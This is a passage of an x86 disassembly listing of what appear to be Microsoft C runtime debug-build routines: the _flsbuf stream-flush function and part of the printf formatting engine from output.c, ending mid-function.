sub_427CE0 proc near ; CODE XREF: sub_41EA60+E5�p
; sub_41EC30+E4�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
loc_427CE9: ; CODE XREF: sub_427CE0+31�j
cmp [ebp+arg_4], 0
jnz short loc_427D0D
push offset dword_43C514
push 0
push 69h
push offset a_flsbuf_c ; "_flsbuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_427D0D
int 3 ; Trap to Debugger
loc_427D0D: ; CODE XREF: sub_427CE0+D�j
; sub_427CE0+2A�j
xor eax, eax
test eax, eax
jnz short loc_427CE9
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov [ebp+var_10], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 82h
test edx, edx
jz short loc_427D3F
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 40h
test ecx, ecx
jz short loc_427D55
loc_427D3F: ; CODE XREF: sub_427CE0+50�j
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
or al, 20h
mov ecx, [ebp+var_8]
mov [ecx+0Ch], eax
or eax, 0FFFFFFFFh
jmp loc_427F4D
; ---------------------------------------------------------------------------
loc_427D55: ; CODE XREF: sub_427CE0+5D�j
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 1
test eax, eax
jz short loc_427DAC
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 10h
test eax, eax
jz short loc_427D95
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov [ecx], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFFEh
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
jmp short loc_427DAC
; ---------------------------------------------------------------------------
loc_427D95: ; CODE XREF: sub_427CE0+97�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
or eax, 0FFFFFFFFh
jmp loc_427F4D
; ---------------------------------------------------------------------------
loc_427DAC: ; CODE XREF: sub_427CE0+80�j
; sub_427CE0+B3�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
or edx, 2
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFEFh
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov [ebp+var_4], 0
mov edx, [ebp+var_4]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jnz short loc_427E1F
cmp [ebp+var_8], offset dword_451868
jz short loc_427E03
cmp [ebp+var_8], offset dword_451888
jnz short loc_427E13
loc_427E03: ; CODE XREF: sub_427CE0+118�j
mov edx, [ebp+var_10]
push edx
call sub_431A40
add esp, 4
test eax, eax
jnz short loc_427E1F
loc_427E13: ; CODE XREF: sub_427CE0+121�j
mov eax, [ebp+var_8]
push eax
call sub_4313D0
add esp, 4
loc_427E1F: ; CODE XREF: sub_427CE0+10F�j
; sub_427CE0+131�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jz loc_427F0B
loc_427E33: ; CODE XREF: sub_427CE0+187�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [eax]
sub edx, [ecx+8]
test edx, edx
jge short loc_427E63
push offset aInconsistentIo ; "(\"inconsistent IOB fields\", stream->_pt"...
push 0
push 0A0h
push offset a_flsbuf_c ; "_flsbuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_427E63
int 3 ; Trap to Debugger
loc_427E63: ; CODE XREF: sub_427CE0+160�j
; sub_427CE0+180�j
xor eax, eax
test eax, eax
jnz short loc_427E33
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [ecx]
sub eax, [edx+8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+var_8]
mov [eax], edx
mov ecx, [ebp+var_8]
mov edx, [ecx+18h]
sub edx, 1
mov eax, [ebp+var_8]
mov [eax+4], edx
cmp [ebp+var_4], 0
jle short loc_427EB6
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+8]
push eax
mov ecx, [ebp+var_10]
push ecx
call sub_42E940
add esp, 0Ch
mov [ebp+var_C], eax
jmp short loc_427EFE
; ---------------------------------------------------------------------------
loc_427EB6: ; CODE XREF: sub_427CE0+1B8�j
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_427ED9
mov edx, [ebp+var_10]
sar edx, 5
mov eax, [ebp+var_10]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
add ecx, eax
mov [ebp+var_14], ecx
jmp short loc_427EE0
; ---------------------------------------------------------------------------
loc_427ED9: ; CODE XREF: sub_427CE0+1DA�j
mov [ebp+var_14], offset dword_454390
loc_427EE0: ; CODE XREF: sub_427CE0+1F7�j
mov edx, [ebp+var_14]
movsx eax, byte ptr [edx+4]
and eax, 20h
test eax, eax
jz short loc_427EFE
push 2
push 0
mov ecx, [ebp+var_10]
push ecx
call sub_42E4E0
add esp, 0Ch
loc_427EFE: ; CODE XREF: sub_427CE0+1D4�j
; sub_427CE0+20C�j
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_427F29
; ---------------------------------------------------------------------------
loc_427F0B: ; CODE XREF: sub_427CE0+14D�j
mov [ebp+var_4], 1
mov edx, [ebp+var_4]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_10]
push ecx
call sub_42E940
add esp, 0Ch
mov [ebp+var_C], eax
loc_427F29: ; CODE XREF: sub_427CE0+229�j
mov edx, [ebp+var_C]
cmp edx, [ebp+var_4]
jz short loc_427F45
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
or ecx, 20h
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
or eax, 0FFFFFFFFh
jmp short loc_427F4D
; ---------------------------------------------------------------------------
loc_427F45: ; CODE XREF: sub_427CE0+24F�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_427F4D: ; CODE XREF: sub_427CE0+70�j
; sub_427CE0+C7�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_427CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F60 proc near ; CODE XREF: sub_41EA60+9A�p
; sub_41EC30+99�p ...
var_2A6 = word ptr -2A6h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = byte ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = word ptr -248h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_23F = byte ptr -23Fh
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = byte ptr -228h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2A8h
push ebx
push esi
push edi
mov [ebp+var_24], 0
mov [ebp+var_22C], 0
mov [ebp+var_18], 0
loc_427F84: ; CODE XREF: sub_427F60:loc_428B72�j
mov eax, [ebp+arg_4]
mov cl, [eax]
mov byte ptr [ebp+var_28], cl
movsx edx, byte ptr [ebp+var_28]
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
test edx, edx
jz loc_428B77
cmp [ebp+var_22C], 0
jl loc_428B77
movsx ecx, byte ptr [ebp+var_28]
cmp ecx, 20h
jl short loc_427FD6
movsx edx, byte ptr [ebp+var_28]
cmp edx, 78h
jg short loc_427FD6
movsx eax, byte ptr [ebp+var_28]
movsx ecx, byte ptr [eax+43D150h]
and ecx, 0Fh
mov [ebp+var_290], ecx
jmp short loc_427FE0
; ---------------------------------------------------------------------------
loc_427FD6: ; CODE XREF: sub_427F60+55�j
; sub_427F60+5E�j
mov [ebp+var_290], 0
loc_427FE0: ; CODE XREF: sub_427F60+74�j
mov edx, [ebp+var_290]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_18]
movsx edx, ds:byte_43D170[ecx+eax*8]
sar edx, 4
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
mov [ebp+var_294], eax
cmp [ebp+var_294], 7
ja loc_428B72
mov ecx, [ebp+var_294]
jmp off_428B84[ecx*4]
loc_428020: ; CODE XREF: sub_427F60+332�j
; DATA XREF: _0:off_428B84�o
mov [ebp+var_1C], 0
mov edx, [ebp+var_28]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_42809D
lea edx, [ebp+var_22C]
push edx
mov eax, [ebp+arg_0]
push eax
movsx ecx, byte ptr [ebp+var_28]
push ecx
call sub_428C90
add esp, 0Ch
mov edx, [ebp+arg_4]
mov al, [edx]
mov byte ptr [ebp+var_28], al
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
loc_42806E: ; CODE XREF: sub_427F60+13B�j
movsx edx, byte ptr [ebp+var_28]
test edx, edx
jnz short loc_428097
push offset aCh_t0 ; "ch != _T('\\0')"
push 0
push 186h
push offset aOutput_c ; "output.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_428097
int 3 ; Trap to Debugger
loc_428097: ; CODE XREF: sub_427F60+114�j
; sub_427F60+134�j
xor eax, eax
test eax, eax
jnz short loc_42806E
loc_42809D: ; CODE XREF: sub_427F60+E3�j
lea ecx, [ebp+var_22C]
push ecx
mov edx, [ebp+arg_0]
push edx
movsx eax, byte ptr [ebp+var_28]
push eax
call sub_428C90
add esp, 0Ch
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_4280BA: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B88�o
mov [ebp+var_8], 0
mov ecx, [ebp+var_8]
mov [ebp+var_23C], ecx
mov edx, [ebp+var_23C]
mov [ebp+var_244], edx
mov eax, [ebp+var_244]
mov [ebp+var_10], eax
mov [ebp+var_4], 0
mov [ebp+var_234], 0FFFFFFFFh
mov [ebp+var_1C], 0
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_4280FC: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B8C�o
movsx ecx, byte ptr [ebp+var_28]
mov [ebp+var_298], ecx
mov edx, [ebp+var_298]
sub edx, 20h
mov [ebp+var_298], edx
cmp [ebp+var_298], 10h
ja short loc_428166
mov ecx, [ebp+var_298]
xor eax, eax
mov al, byte_428BBC[ecx]
jmp off_428BA4[eax*4]
loc_428133: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428BB0�o
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
jmp short loc_428166
; ---------------------------------------------------------------------------
loc_42813E: ; CODE XREF: sub_427F60+B9�j
; sub_427F60+1CC�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
jmp short loc_428166
; ---------------------------------------------------------------------------
loc_428148: ; CODE XREF: sub_427F60+B9�j
; sub_427F60+1CC�j
; DATA XREF: ...
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
jmp short loc_428166
; ---------------------------------------------------------------------------
loc_428153: ; CODE XREF: sub_427F60+B9�j
; sub_427F60+1CC�j
; DATA XREF: ...
mov edx, [ebp+var_4]
or dl, 80h
mov [ebp+var_4], edx
jmp short loc_428166
; ---------------------------------------------------------------------------
loc_42815E: ; CODE XREF: sub_427F60+B9�j
; sub_427F60+1CC�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_428166: ; CODE XREF: sub_427F60+B9�j
; sub_427F60+1BC�j ...
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_42816B: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B90�o
movsx ecx, byte ptr [ebp+var_28]
cmp ecx, 2Ah
jnz short loc_4281A7
lea edx, [ebp+arg_8]
push edx
call sub_428DA0
add esp, 4
mov [ebp+var_244], eax
cmp [ebp+var_244], 0
jge short loc_4281A5
mov eax, [ebp+var_4]
or al, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_244]
neg ecx
mov [ebp+var_244], ecx
loc_4281A5: ; CODE XREF: sub_427F60+22D�j
jmp short loc_4281BE
; ---------------------------------------------------------------------------
loc_4281A7: ; CODE XREF: sub_427F60+212�j
mov edx, [ebp+var_244]
imul edx, 0Ah
movsx eax, byte ptr [ebp+var_28]
lea ecx, [edx+eax-30h]
mov [ebp+var_244], ecx
loc_4281BE: ; CODE XREF: sub_427F60:loc_4281A5�j
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_4281C3: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B94�o
mov [ebp+var_234], 0
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_4281D2: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B98�o
movsx edx, byte ptr [ebp+var_28]
cmp edx, 2Ah
jnz short loc_428202
lea eax, [ebp+arg_8]
push eax
call sub_428DA0
add esp, 4
mov [ebp+var_234], eax
cmp [ebp+var_234], 0
jge short loc_428200
mov [ebp+var_234], 0FFFFFFFFh
loc_428200: ; CODE XREF: sub_427F60+294�j
jmp short loc_428219
; ---------------------------------------------------------------------------
loc_428202: ; CODE XREF: sub_427F60+279�j
mov ecx, [ebp+var_234]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_28]
lea eax, [ecx+edx-30h]
mov [ebp+var_234], eax
loc_428219: ; CODE XREF: sub_427F60:loc_428200�j
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_42821E: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428B9C�o
movsx ecx, byte ptr [ebp+var_28]
mov [ebp+var_29C], ecx
mov edx, [ebp+var_29C]
sub edx, 49h
mov [ebp+var_29C], edx
cmp [ebp+var_29C], 2Eh
ja short loc_4282AC
mov ecx, [ebp+var_29C]
xor eax, eax
mov al, byte_428BE1[ecx]
jmp off_428BCD[eax*4]
loc_428255: ; DATA XREF: _0:00428BD5�o
mov edx, [ebp+var_4]
or edx, 10h
mov [ebp+var_4], edx
jmp short loc_4282AC
; ---------------------------------------------------------------------------
loc_428260: ; CODE XREF: sub_427F60+2EE�j
; DATA XREF: _0:off_428BCD�o
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
cmp ecx, 36h
jnz short loc_42828B
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+1]
cmp eax, 34h
jnz short loc_42828B
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
mov edx, [ebp+var_4]
or dh, 80h
mov [ebp+var_4], edx
jmp short loc_428297
; ---------------------------------------------------------------------------
loc_42828B: ; CODE XREF: sub_427F60+309�j
; sub_427F60+315�j
mov [ebp+var_18], 0
jmp loc_428020
; ---------------------------------------------------------------------------
loc_428297: ; CODE XREF: sub_427F60+329�j
jmp short loc_4282AC
; ---------------------------------------------------------------------------
loc_428299: ; CODE XREF: sub_427F60+2EE�j
; DATA XREF: _0:00428BD1�o
mov eax, [ebp+var_4]
or al, 20h
mov [ebp+var_4], eax
jmp short loc_4282AC
; ---------------------------------------------------------------------------
loc_4282A3: ; CODE XREF: sub_427F60+2EE�j
; DATA XREF: _0:00428BD9�o
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_4282AC: ; CODE XREF: sub_427F60+2DE�j
; sub_427F60+2EE�j ...
jmp loc_428B72
; ---------------------------------------------------------------------------
loc_4282B1: ; CODE XREF: sub_427F60+B9�j
; DATA XREF: _0:00428BA0�o
movsx edx, byte ptr [ebp+var_28]
mov [ebp+var_2A0], edx
mov eax, [ebp+var_2A0]
sub eax, 43h
mov [ebp+var_2A0], eax
cmp [ebp+var_2A0], 35h
ja loc_428997
mov edx, [ebp+var_2A0]
xor ecx, ecx
mov cl, byte_428C4C[edx]
jmp off_428C10[ecx*4]
loc_4282EC: ; DATA XREF: _0:off_428C10�o
mov eax, [ebp+var_4]
and eax, 830h
test eax, eax
jnz short loc_428301
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_428301: ; CODE XREF: sub_427F60+385�j
; sub_427F60+396�j
; DATA XREF: ...
mov edx, [ebp+var_4]
and edx, 810h
test edx, edx
jz short loc_428347
lea eax, [ebp+arg_8]
push eax
call sub_428DE0
add esp, 4
mov [ebp+var_14], ax
mov cx, [ebp+var_14]
push ecx
lea edx, [ebp+var_228]
push edx
call sub_431A80
add esp, 8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jge short loc_428345
mov [ebp+var_23C], 1
loc_428345: ; CODE XREF: sub_427F60+3D9�j
jmp short loc_42836D
; ---------------------------------------------------------------------------
loc_428347: ; CODE XREF: sub_427F60+3AC�j
lea eax, [ebp+arg_8]
push eax
call sub_428DA0
add esp, 4
mov [ebp+var_248], ax
mov cl, byte ptr [ebp+var_248]
mov [ebp+var_228], cl
mov [ebp+var_24], 1
loc_42836D: ; CODE XREF: sub_427F60:loc_428345�j
lea edx, [ebp+var_228]
mov [ebp+var_20], edx
jmp loc_428997
; ---------------------------------------------------------------------------
loc_42837B: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C20�o
lea eax, [ebp+arg_8]
push eax
call sub_428DA0
add esp, 4
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0
jz short loc_4283A2
mov ecx, [ebp+var_24C]
cmp dword ptr [ecx+4], 0
jnz short loc_4283BC
loc_4283A2: ; CODE XREF: sub_427F60+434�j
mov edx, ds:off_453DFC
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_41BC70
add esp, 4
mov [ebp+var_24], eax
jmp short loc_42840B
; ---------------------------------------------------------------------------
loc_4283BC: ; CODE XREF: sub_427F60+440�j
mov ecx, [ebp+var_4]
and ecx, 800h
test ecx, ecx
jz short loc_4283EC
mov edx, [ebp+var_24C]
mov eax, [edx+4]
mov [ebp+var_20], eax
mov ecx, [ebp+var_24C]
movsx edx, word ptr [ecx]
shr edx, 1
mov [ebp+var_24], edx
mov [ebp+var_1C], 1
jmp short loc_42840B
; ---------------------------------------------------------------------------
loc_4283EC: ; CODE XREF: sub_427F60+467�j
mov [ebp+var_1C], 0
mov eax, [ebp+var_24C]
mov ecx, [eax+4]
mov [ebp+var_20], ecx
mov edx, [ebp+var_24C]
movsx eax, word ptr [edx]
mov [ebp+var_24], eax
loc_42840B: ; CODE XREF: sub_427F60+45A�j
; sub_427F60+48A�j
jmp loc_428997
; ---------------------------------------------------------------------------
loc_428410: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C18�o
mov ecx, [ebp+var_4]
and ecx, 830h
test ecx, ecx
jnz short loc_428426
mov edx, [ebp+var_4]
or dh, 8
mov [ebp+var_4], edx
loc_428426: ; CODE XREF: sub_427F60+385�j
; sub_427F60+4BB�j
; DATA XREF: ...
cmp [ebp+var_234], 0FFFFFFFFh
jnz short loc_42843B
mov [ebp+var_2A4], 7FFFFFFFh
jmp short loc_428447
; ---------------------------------------------------------------------------
loc_42843B: ; CODE XREF: sub_427F60+4CD�j
mov eax, [ebp+var_234]
mov [ebp+var_2A4], eax
loc_428447: ; CODE XREF: sub_427F60+4D9�j
mov ecx, [ebp+var_2A4]
mov [ebp+var_258], ecx
lea edx, [ebp+arg_8]
push edx
call sub_428DA0
add esp, 4
mov [ebp+var_20], eax
mov eax, [ebp+var_4]
and eax, 810h
test eax, eax
jz short loc_4284D6
cmp [ebp+var_20], 0
jnz short loc_42847D
mov ecx, ds:off_453E00
mov [ebp+var_20], ecx
loc_42847D: ; CODE XREF: sub_427F60+512�j
mov [ebp+var_1C], 1
mov edx, [ebp+var_20]
mov [ebp+var_254], edx
loc_42848D: ; CODE XREF: sub_427F60+564�j
mov eax, [ebp+var_258]
mov ecx, [ebp+var_258]
sub ecx, 1
mov [ebp+var_258], ecx
test eax, eax
jz short loc_4284C6
mov edx, [ebp+var_254]
xor eax, eax
mov ax, [edx]
test eax, eax
jz short loc_4284C6
mov ecx, [ebp+var_254]
add ecx, 2
mov [ebp+var_254], ecx
jmp short loc_42848D
; ---------------------------------------------------------------------------
loc_4284C6: ; CODE XREF: sub_427F60+544�j
; sub_427F60+553�j
mov edx, [ebp+var_254]
sub edx, [ebp+var_20]
sar edx, 1
mov [ebp+var_24], edx
jmp short loc_428530
; ---------------------------------------------------------------------------
loc_4284D6: ; CODE XREF: sub_427F60+50C�j
cmp [ebp+var_20], 0
jnz short loc_4284E4
mov eax, ds:off_453DFC
mov [ebp+var_20], eax
loc_4284E4: ; CODE XREF: sub_427F60+57A�j
mov ecx, [ebp+var_20]
mov [ebp+var_250], ecx
loc_4284ED: ; CODE XREF: sub_427F60+5C2�j
mov edx, [ebp+var_258]
mov eax, [ebp+var_258]
sub eax, 1
mov [ebp+var_258], eax
test edx, edx
jz short loc_428524
mov ecx, [ebp+var_250]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_428524
mov eax, [ebp+var_250]
add eax, 1
mov [ebp+var_250], eax
jmp short loc_4284ED
; ---------------------------------------------------------------------------
loc_428524: ; CODE XREF: sub_427F60+5A4�j
; sub_427F60+5B1�j
mov ecx, [ebp+var_250]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
loc_428530: ; CODE XREF: sub_427F60+574�j
jmp loc_428997
; ---------------------------------------------------------------------------
loc_428535: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C30�o
lea edx, [ebp+arg_8]
push edx
call sub_428DA0
add esp, 4
mov [ebp+var_25C], eax
mov eax, [ebp+var_4]
and eax, 20h
test eax, eax
jz short loc_428563
mov ecx, [ebp+var_25C]
mov dx, word ptr [ebp+var_22C]
mov [ecx], dx
jmp short loc_428571
; ---------------------------------------------------------------------------
loc_428563: ; CODE XREF: sub_427F60+5EF�j
mov eax, [ebp+var_25C]
mov ecx, [ebp+var_22C]
mov [eax], ecx
loc_428571: ; CODE XREF: sub_427F60+601�j
mov [ebp+var_23C], 1
jmp loc_428997
; ---------------------------------------------------------------------------
loc_428580: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C14�o
mov [ebp+var_8], 1
mov dl, byte ptr [ebp+var_28]
add dl, 20h
mov byte ptr [ebp+var_28], dl
loc_428590: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C2C�o
mov eax, [ebp+var_4]
or al, 40h
mov [ebp+var_4], eax
lea ecx, [ebp+var_228]
mov [ebp+var_20], ecx
cmp [ebp+var_234], 0
jge short loc_4285B6
mov [ebp+var_234], 6
jmp short loc_4285D2
; ---------------------------------------------------------------------------
loc_4285B6: ; CODE XREF: sub_427F60+648�j
cmp [ebp+var_234], 0
jnz short loc_4285D2
movsx edx, byte ptr [ebp+var_28]
cmp edx, 67h
jnz short loc_4285D2
mov [ebp+var_234], 1
loc_4285D2: ; CODE XREF: sub_427F60+654�j
; sub_427F60+65D�j ...
mov eax, [ebp+arg_8]
add eax, 8
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_8]
sub ecx, 8
mov edx, [ecx]
mov eax, [ecx+4]
mov [ebp+var_264], edx
mov [ebp+var_260], eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_234]
push edx
movsx eax, byte ptr [ebp+var_28]
push eax
mov ecx, [ebp+var_20]
push ecx
lea edx, [ebp+var_264]
push edx
call ds:off_454190
add esp, 14h
mov eax, [ebp+var_4]
and eax, 80h
test eax, eax
jz short loc_428638
cmp [ebp+var_234], 0
jnz short loc_428638
mov ecx, [ebp+var_20]
push ecx
call ds:off_45419C
add esp, 4
loc_428638: ; CODE XREF: sub_427F60+6C0�j
; sub_427F60+6C9�j
movsx edx, byte ptr [ebp+var_28]
cmp edx, 67h
jnz short loc_42865A
mov eax, [ebp+var_4]
and eax, 80h
test eax, eax
jnz short loc_42865A
mov ecx, [ebp+var_20]
push ecx
call ds:off_454194
add esp, 4
loc_42865A: ; CODE XREF: sub_427F60+6DF�j
; sub_427F60+6EB�j
mov edx, [ebp+var_20]
movsx eax, byte ptr [edx]
cmp eax, 2Dh
jnz short loc_428677
mov ecx, [ebp+var_4]
or ch, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_428677: ; CODE XREF: sub_427F60+703�j
mov eax, [ebp+var_20]
push eax
call sub_41BC70
add esp, 4
mov [ebp+var_24], eax
jmp loc_428997
; ---------------------------------------------------------------------------
loc_42868B: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C28�o
mov ecx, [ebp+var_4]
or ecx, 40h
mov [ebp+var_4], ecx
mov [ebp+var_238], 0Ah
jmp loc_428725
; ---------------------------------------------------------------------------
loc_4286A3: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C40�o
mov [ebp+var_238], 0Ah
jmp short loc_428725
; ---------------------------------------------------------------------------
loc_4286AF: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C38�o
mov [ebp+var_234], 8
loc_4286B9: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C1C�o
mov [ebp+var_230], 7
jmp short loc_4286CF
; ---------------------------------------------------------------------------
loc_4286C5: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C44�o
mov [ebp+var_230], 27h
loc_4286CF: ; CODE XREF: sub_427F60+763�j
mov [ebp+var_238], 10h
mov edx, [ebp+var_4]
and edx, 80h
test edx, edx
jz short loc_428703
mov [ebp+var_240], 30h
mov eax, [ebp+var_230]
add eax, 51h
mov [ebp+var_23F], al
mov [ebp+var_10], 2
loc_428703: ; CODE XREF: sub_427F60+784�j
jmp short loc_428725
; ---------------------------------------------------------------------------
loc_428705: ; CODE XREF: sub_427F60+385�j
; DATA XREF: _0:00428C34�o
mov [ebp+var_238], 8
mov ecx, [ebp+var_4]
and ecx, 80h
test ecx, ecx
jz short loc_428725
mov edx, [ebp+var_4]
or dh, 2
mov [ebp+var_4], edx
loc_428725: ; CODE XREF: sub_427F60+73E�j
; sub_427F60+74D�j ...
mov eax, [ebp+var_4]
and eax, 8000h
test eax, eax
jz short loc_42874E
lea ecx, [ebp+arg_8]
push ecx
call sub_428DC0
add esp, 4
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp loc_4287DF
; ---------------------------------------------------------------------------
loc_42874E: ; CODE XREF: sub_427F60+7CF�j
mov edx, [ebp+var_4]
and edx, 20h
test edx, edx
jz short loc_4287A0
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_428780
lea ecx, [ebp+arg_8]
push ecx
call sub_428DA0
add esp, 4
movsx eax, ax
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp short loc_42879E
; ---------------------------------------------------------------------------
loc_428780: ; CODE XREF: sub_427F60+800�j
lea edx, [ebp+arg_8]
push edx
call sub_428DA0
add esp, 4
and eax, 0FFFFh
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
loc_42879E: ; CODE XREF: sub_427F60+81E�j
jmp short loc_4287DF
; ---------------------------------------------------------------------------
loc_4287A0: ; CODE XREF: sub_427F60+7F6�j
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_4287C5
lea ecx, [ebp+arg_8]
push ecx
call sub_428DA0
add esp, 4
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp short loc_4287DF
; ---------------------------------------------------------------------------
loc_4287C5: ; CODE XREF: sub_427F60+848�j
lea edx, [ebp+arg_8]
push edx
call sub_428DA0
add esp, 4
xor ecx, ecx
mov [ebp+var_278], eax
mov [ebp+var_274], ecx
loc_4287DF: ; CODE XREF: sub_427F60+7E9�j
; sub_427F60:loc_42879E�j ...
mov edx, [ebp+var_4]
and edx, 40h
test edx, edx
jz short loc_428827
cmp [ebp+var_274], 0
jg short loc_428827
jl short loc_4287FD
cmp [ebp+var_278], 0
jnb short loc_428827
loc_4287FD: ; CODE XREF: sub_427F60+892�j
mov eax, [ebp+var_278]
neg eax
mov ecx, [ebp+var_274]
adc ecx, 0
neg ecx
